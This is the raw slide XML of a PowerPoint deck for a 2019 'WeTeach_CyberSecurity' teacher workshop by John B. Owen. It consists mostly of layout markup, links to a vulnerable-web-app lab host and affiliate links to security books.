              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3623798E-89D2-41D6-9306-F48B694A4834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6440129" y="1476639"/>
            <a:ext cx="4737678" cy="3837854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396429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0633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heme" Target="../theme/theme2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.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1" y="-12352"/>
            <a:ext cx="9123452" cy="578580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BE5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sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1828" t="13980" r="86524" b="58256"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="42805" y="11082"/>
            <a:ext cx="640483" cy="555145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9123451" y="-12352"/>
            <a:ext cx="3068547" cy="578580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="333F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sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="28473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946105" y="-33026"/>
            <a:ext cx="1904587" cy="671019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="70728"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9503589" y="66146"/>
            <a:ext cx="489426" cy="421343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11438021" y="6481010"/>
            <a:ext cx="657727" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">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DA9D345-DDAA-FE48-B6AA-F739FBB6730C}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BE5812"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Avenir Roman"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="BE5812"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26B7C9F-4E40-452E-9E6E-A8F250282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733692-AFC0-4EF8-96AC-0117CF7EF0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DF2ED-627C-4B9C-AB6B-528941DB17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fld id="{C6FD5D87-797C-4896-A64C-39944E0188B0}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Avenir Roman"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/15/2019</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3819F6CF-708E-4C94-92D5-5710AFF0D5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tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437876A7-3750-4F77-99FE-7A8124680D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0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8AE375D0-590F-415F-A990-307990254D6F}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Avenir Roman"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">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prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Avenir Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549CACE2-9CA3-4054-B491-662F52E5EA9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2726" t="16373" r="39177" b="72359"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="783152" y="-12512"/>
            <a:ext cx="6793189" cy="578740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId6"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273473110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1" y="-12352"/>
            <a:ext cx="9123452" cy="578580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BE5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p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9123451" y="-12352"/>
            <a:ext cx="3068547" cy="578580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="333F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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="28473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946105" y="-33026"/>
            <a:ext cx="1904587" cy="671019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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r="70728"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9503589" y="66146"/>
            <a:ext cx="489426" cy="421343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11438021" y="6481010"/>
            <a:ext cx="657727"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A9D345-DDAA-FE48-B6AA-F739FBB6730C}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="BE5812"/>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BE5812"/>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99087518-4AF4-435D-A051-06EED622B4D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28" t="13980" r="86524" b="58256"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="42805" y="11082"/>
            <a:ext cx="640483" cy="555145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{135B10B4-78BA-4EA0-A12D-D4F4C310943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2726" t="16373" r="39177" b="72359"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="783152" y="-12512"/>
            <a:ext cx="6793189" cy="578740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId3"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145337963"/>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100.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slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag103.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slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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8.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0.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3.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5.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6.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7.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9.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0.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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21.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12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3.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4.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5.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8.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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1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13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1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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag134.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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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tags" Target="../tags/tag136.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7.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8.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9.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1.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4.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5.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6.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147.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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tags" Target="../tags/tag148.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9.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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150.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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tags" Target="../tags/tag15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15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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag153.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag154.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5.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6.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7.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8.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hyperlink" Target="http://dvwa.example.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag164.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6.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide181.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dvwa.example.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag167.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag169.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag170.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5.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4.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5.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6.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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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hyperlink" Target="http://dvwa.example.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag178.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9.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80.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81.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8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30.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/dp/0802145949/ref=as_li_ss_tl?&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=99569ce4bd2161ab10302f08fe72d272&amp;language=en_US" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Tubes-Journey-Internet-Andrew-Blum/dp/0061994952/ref=as_li_ss_tl?keywords=tubes+book&amp;qid=1561139186&amp;s=gateway&amp;sr=8-1&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=121ac29825d53cc5e9a539eae45c0303&amp;language=en_US" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Art-Deception-Controlling-Element-Security/dp/076454280X/ref=as_li_ss_tl?keywords=the+art+of+deception&amp;qid=1561139250&amp;s=gateway&amp;sr=8-2&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=7c43fb7bf0ccad5f98d8ed71d8397476&amp;language=en_US" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/ref=as_li_ss_tl?crid=3401J9UJP6QNE&amp;keywords=the+code+book&amp;qid=1561139239&amp;s=gateway&amp;sprefix=the+code+book,aps,167&amp;sr=8-1&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=174bc096ea00c1d669853b25f8b57ee5&amp;language=en_US" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/dp/1476763267/ref=as_li_ss_tl?&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=000133a34b9f67971c5919e4989870d9&amp;language=en_U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amazon.com/dp/1492603236/ref=as_li_ss_tl?&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=82698d8336450b558c085efba07ebce3&amp;language=en_US" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/dp/0770436196/ref=as_li_ss_tl?&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=b937d6220506e6f2ba5aa487c2ad928c&amp;language=en_US" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/dp/0815735472/ref=as_li_ss_tl?&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=8ce9f6e136cbcba96f979c1e69073dbf&amp;language=en_US" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787/ref=as_li_ss_tl?keywords=cuckoos+egg+book&amp;qid=1561139206&amp;s=gateway&amp;sr=8-1&amp;linkCode=ll1&amp;tag=neoduxcom-20&amp;linkId=0261d65ab37528b150f38a3a0eb12291&amp;language=en_U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4.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9.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4.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8.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0.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5.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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8.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0.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1.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4.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5.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8.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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4319588"/>
            <a:ext cx="12192000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CS Workshop July 15-16 2019</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257549" y="942975"/>
            <a:ext cx="6934451" cy="2967038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Vitesse Bold" pitchFamily="50" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>WeTeach_CyberSecurity</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Vitesse Bold" pitchFamily="50" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Vitesse Bold" pitchFamily="50" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11684000" y="6273800"/>
            <a:ext cx="406400" cy="584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Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="4864791"/>
            <a:ext cx="3968000" cy="1733873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>John B. Owen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CS Professional Development Specialist </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
